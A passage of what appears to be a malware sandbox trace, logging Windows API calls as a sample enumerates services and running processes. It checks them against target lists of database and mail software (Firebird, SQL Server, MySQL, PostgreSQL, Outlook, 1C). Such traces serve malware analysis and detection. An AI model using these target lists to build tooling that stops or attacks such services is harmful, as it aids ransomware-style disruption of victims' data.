(lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0265.546] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0265.546] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0265.547] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0265.547] lstrlenW (lpString="MMCSS") returned 5 [0265.547] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0265.547] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0265.547] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0265.547] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0265.547] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0265.547] lstrlenW (lpString="MpsSvc") returned 6 [0265.547] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0265.547] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0265.547] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0265.547] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0265.547] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0265.547] lstrlenW (lpString="nsi") returned 3 [0265.547] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0265.547] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0265.547] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0265.547] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0265.547] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0265.547] lstrlenW (lpString="PlugPlay") returned 8 [0265.547] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0265.547] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0265.547] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0265.547] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0265.548] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0265.548] lstrlenW (lpString="Power") returned 5 [0265.548] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0265.548] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0265.548] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0265.548] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0265.548] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0265.548] lstrlenW (lpString="ProfSvc") returned 7 [0265.548] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0265.548] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0265.548] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0265.548] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0265.548] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0265.548] lstrlenW (lpString="RpcEptMapper") returned 12 [0265.548] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0265.548] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0265.548] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0265.548] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0265.548] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0265.548] lstrlenW (lpString="RpcSs") returned 5 [0265.548] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0265.548] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0265.548] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0265.548] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0265.548] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0265.548] lstrlenW (lpString="SamSs") returned 5 [0265.548] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0265.548] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0265.549] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0265.549] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0265.549] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0265.549] lstrlenW (lpString="Schedule") returned 8 [0265.549] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0265.549] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0265.549] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0265.549] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0265.549] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0265.549] lstrlenW (lpString="SENS") returned 4 [0265.549] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0265.549] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0265.549] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0265.549] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0265.549] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0265.549] lstrlenW (lpString="ShellHWDetection") returned 16 [0265.549] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0265.549] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0265.549] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0265.549] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0265.549] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0265.549] lstrlenW (lpString="Spooler") returned 7 [0265.549] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0265.549] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0265.549] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0265.549] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0265.549] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0265.549] lstrlenW (lpString="Themes") returned 6 [0265.549] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0265.549] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0265.550] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0265.550] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0265.550] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0265.550] lstrlenW (lpString="UxSms") returned 5 [0265.550] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0265.550] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0265.550] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0265.550] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0265.550] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0265.550] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x43acc98 | out: hHeap=0x520000) returned 1 [0265.550] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2a8 [0265.551] Process32FirstW (in: hSnapshot=0x2a8, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0265.551] Process32NextW (in: hSnapshot=0x2a8, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4c, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0265.552] lstrlenW (lpString="System") returned 6 [0265.552] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0265.552] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0265.552] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0265.552] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0265.552] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0265.552] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0265.552] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0265.552] Process32NextW (in: hSnapshot=0x2a8, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0265.552] lstrlenW (lpString="smss.exe") returned 8 [0265.552] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0265.552] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0265.552] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0265.552] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0265.552] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0265.552] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0265.552] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0265.552] Process32NextW (in: hSnapshot=0x2a8, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0265.553] lstrlenW (lpString="csrss.exe") returned 9 [0265.553] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0265.553] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0265.553] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0265.553] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0265.553] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0265.553] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0265.553] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0265.553] Process32NextW (in: hSnapshot=0x2a8, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0265.553] lstrlenW (lpString="wininit.exe") returned 11 [0265.553] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0265.553] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0265.553] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0265.553] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0265.553] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0265.553] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0265.553] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0265.553] Process32NextW (in: hSnapshot=0x2a8, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0265.554] lstrlenW (lpString="csrss.exe") returned 9 [0265.554] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0265.554] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0265.554] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0265.554] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0265.554] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0265.554] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0265.554] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0265.554] Process32NextW (in: hSnapshot=0x2a8, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0265.555] lstrlenW (lpString="winlogon.exe") returned 12 [0265.555] lstrcmpiW (lpString1="1c8.exe", lpString2="winlogon.exe") returned -1 [0265.555] lstrcmpiW (lpString1="1cv77.exe", lpString2="winlogon.exe") returned -1 [0265.555] lstrcmpiW (lpString1="outlook.exe", lpString2="winlogon.exe") returned -1 [0265.555] lstrcmpiW (lpString1="postgres.exe", lpString2="winlogon.exe") returned -1 [0265.555] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="winlogon.exe") returned -1 [0265.555] lstrcmpiW (lpString1="mysqld.exe", lpString2="winlogon.exe") returned -1 [0265.555] lstrcmpiW (lpString1="sqlservr.exe", lpString2="winlogon.exe") returned -1 [0265.555] Process32NextW (in: hSnapshot=0x2a8, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0265.555] lstrlenW (lpString="services.exe") returned 12 [0265.555] lstrcmpiW (lpString1="1c8.exe", lpString2="services.exe") returned -1 [0265.555] lstrcmpiW (lpString1="1cv77.exe", lpString2="services.exe") returned -1 [0265.555] lstrcmpiW (lpString1="outlook.exe", lpString2="services.exe") returned -1 [0265.555] lstrcmpiW (lpString1="postgres.exe", lpString2="services.exe") returned -1 [0265.555] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="services.exe") returned -1 [0265.555] lstrcmpiW (lpString1="mysqld.exe", lpString2="services.exe") returned -1 [0265.555] lstrcmpiW (lpString1="sqlservr.exe", lpString2="services.exe") returned 1 [0265.555] Process32NextW (in: hSnapshot=0x2a8, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0265.556] lstrlenW (lpString="lsass.exe") returned 9 [0265.556] lstrcmpiW (lpString1="1c8.exe", lpString2="lsass.exe") returned -1 [0265.556] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsass.exe") returned -1 [0265.556] lstrcmpiW (lpString1="outlook.exe", lpString2="lsass.exe") returned 1 [0265.556] lstrcmpiW (lpString1="postgres.exe", lpString2="lsass.exe") returned 1 [0265.556] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsass.exe") returned 1 [0265.556] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsass.exe") returned 1 [0265.556] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsass.exe") returned 1 [0265.556] Process32NextW (in: hSnapshot=0x2a8, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0265.556] lstrlenW (lpString="lsm.exe") returned 7 [0265.556] lstrcmpiW (lpString1="1c8.exe", lpString2="lsm.exe") returned -1 [0265.556] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsm.exe") returned -1 [0265.556] lstrcmpiW (lpString1="outlook.exe", lpString2="lsm.exe") returned 1 [0265.556] lstrcmpiW (lpString1="postgres.exe", lpString2="lsm.exe") returned 1 [0265.556] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsm.exe") returned 1 [0265.556] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsm.exe") returned 1 [0265.556] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsm.exe") returned 1 [0265.557] Process32NextW (in: hSnapshot=0x2a8, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0265.557] lstrlenW (lpString="svchost.exe") returned 11 [0265.557] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0265.557] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0265.557] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0265.557] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0265.557] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0265.557] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0265.557] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0265.557] Process32NextW (in: hSnapshot=0x2a8, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0265.557] lstrlenW (lpString="svchost.exe") returned 11 [0265.557] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0265.557] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0265.557] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0265.557] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0265.557] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0265.557] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0265.557] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0265.557] Process32NextW (in: hSnapshot=0x2a8, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0265.558] lstrlenW (lpString="svchost.exe") returned 11 [0265.558] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0265.558] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0265.558] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0265.558] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0265.558] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0265.558] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0265.558] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0265.558] Process32NextW (in: hSnapshot=0x2a8, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x348, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0265.558] lstrlenW (lpString="svchost.exe") returned 11 [0265.558] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0265.558] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0265.558] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0265.558] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0265.558] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0265.558] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0265.558] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0265.558] Process32NextW (in: hSnapshot=0x2a8, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0265.559] lstrlenW (lpString="svchost.exe") returned 11 [0265.559] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0265.559] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0265.559] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0265.559] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0265.559] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0265.559] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0265.559] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0265.559] Process32NextW (in: hSnapshot=0x2a8, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0265.559] lstrlenW (lpString="audiodg.exe") returned 11 [0265.559] lstrcmpiW (lpString1="1c8.exe", lpString2="audiodg.exe") returned -1 [0265.559] lstrcmpiW (lpString1="1cv77.exe", lpString2="audiodg.exe") returned -1 [0265.559] lstrcmpiW (lpString1="outlook.exe", lpString2="audiodg.exe") returned 1 [0265.560] lstrcmpiW (lpString1="postgres.exe", lpString2="audiodg.exe") returned 1 [0265.560] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="audiodg.exe") returned 1 [0265.560] lstrcmpiW (lpString1="mysqld.exe", lpString2="audiodg.exe") returned 1 [0265.560] lstrcmpiW (lpString1="sqlservr.exe", lpString2="audiodg.exe") returned 1 [0265.560] Process32NextW (in: hSnapshot=0x2a8, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0265.560] lstrlenW (lpString="svchost.exe") returned 11 [0265.560] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0265.560] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0265.560] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0265.560] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0265.560] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0265.560] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0265.560] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0265.560] Process32NextW (in: hSnapshot=0x2a8, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0265.560] lstrlenW (lpString="svchost.exe") returned 11 [0265.560] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0265.560] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0265.561] Process32NextW (in: hSnapshot=0x2a8, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0265.561] lstrlenW (lpString="userinit.exe") returned 12 [0265.561] Process32NextW (in: hSnapshot=0x2a8, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x44c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x348, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0265.561] lstrlenW (lpString="dwm.exe") returned 7 [0265.561] Process32NextW (in: hSnapshot=0x2a8, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0265.561] lstrlenW (lpString="explorer.exe") returned 12 [0265.561] Process32NextW (in: hSnapshot=0x2a8, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0265.562] lstrlenW (lpString="spoolsv.exe") returned 11 [0265.562] Process32NextW (in: hSnapshot=0x2a8, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0265.562] lstrlenW (lpString="taskhost.exe") returned 12 [0265.562] Process32NextW (in: hSnapshot=0x2a8, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0265.562] lstrlenW (lpString="svchost.exe") returned 11 [0265.562] Process32NextW (in: hSnapshot=0x2a8, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="payload.exe")) returned 1 [0265.563] lstrlenW (lpString="payload.exe") returned 11 [0265.563] Process32NextW (in: hSnapshot=0x2a8, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0265.563] lstrlenW (lpString="dllhost.exe") returned 11 [0265.563] Process32NextW (in: hSnapshot=0x2a8, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x52c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0265.563] lstrlenW (lpString="reader_sl.exe") returned 13 [0265.563] Process32NextW (in: hSnapshot=0x2a8, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x608, 